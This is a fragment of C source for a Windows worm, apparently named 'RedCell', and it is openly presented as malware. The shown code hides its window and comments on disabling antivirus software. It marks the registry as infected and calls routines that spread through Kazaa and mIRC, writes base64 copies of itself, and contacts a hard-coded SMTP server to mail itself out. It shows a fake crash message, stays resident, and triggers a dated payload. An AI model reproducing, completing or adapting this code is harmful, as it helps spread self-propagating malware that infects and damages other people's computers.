hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
|
|
UpdateWindow(hwnd);
|
|
//Hide the window
|
|
ShowWindow(hwnd,SW_HIDE);
|
|
//Get the filename and disable (if possible) any AVs
|
|
GetWindowThreadProcessId(hwnd,&ProcessId);
|
|
processes();
|
|
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
|
|
//Check if the comp. was infected before
|
|
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
|
|
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
|
|
RegCloseKey(hKey);
|
|
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
|
|
{
|
|
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
|
|
//Create a key in the registry to mark the PC as infected
|
|
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
|
|
RegCloseKey(hKey);
|
|
//----INFECT COMPUTER----
|
|
infectwin(filename);
|
|
kazaa(filename);
|
|
zipit(winbkup);
|
|
mirc();
|
|
base64(filename);
|
|
conect();
|
|
first=1;
|
|
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
|
|
}
|
|
base64(filename);
|
|
GetSystemTime(&time);
|
|
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
|
|
if (first==0) {
|
|
base64(filename); //Write a "base64" encoded file every time (just in case)
|
|
conect(); //Try to connect
|
|
if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
|
|
strcpy(server,"smtp.barrysworld.com");
|
|
strcpy(email,"john@barrysworld.com");
|
|
strcpy(helo,"barrysworld.com");
|
|
conect();
|
|
}
|
|
}
|
|
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
|
|
|
|
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
|
|
TranslateMessage(&msg);
|
|
DispatchMessage(&msg);
|
|
}
|
|
return msg.wParam;
|
|
//end of main()
|
|
}
|
|
|
|
//--------------------------------------WNDPROC----------------------------------------------
|
|
|
|
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
|
|
HDC hdc;
|
|
PAINTSTRUCT ps;
|
|
|
|
switch(iMsg){
|
|
case WM_PAINT:
|
|
hdc = BeginPaint(hwnd,&ps);
|
|
EndPaint(hwnd,&ps);
|
|
return 0;
|
|
case WM_DESTROY:
|
|
PostQuitMessage(0);
|
|
return 0;
|
|
}
|
|
return DefWindowProc(hwnd,iMsg,wParam,lParam);
|
|
}
|
|
//That's all folks! e-mail to: MI_pirat@yahoo.com , web:
|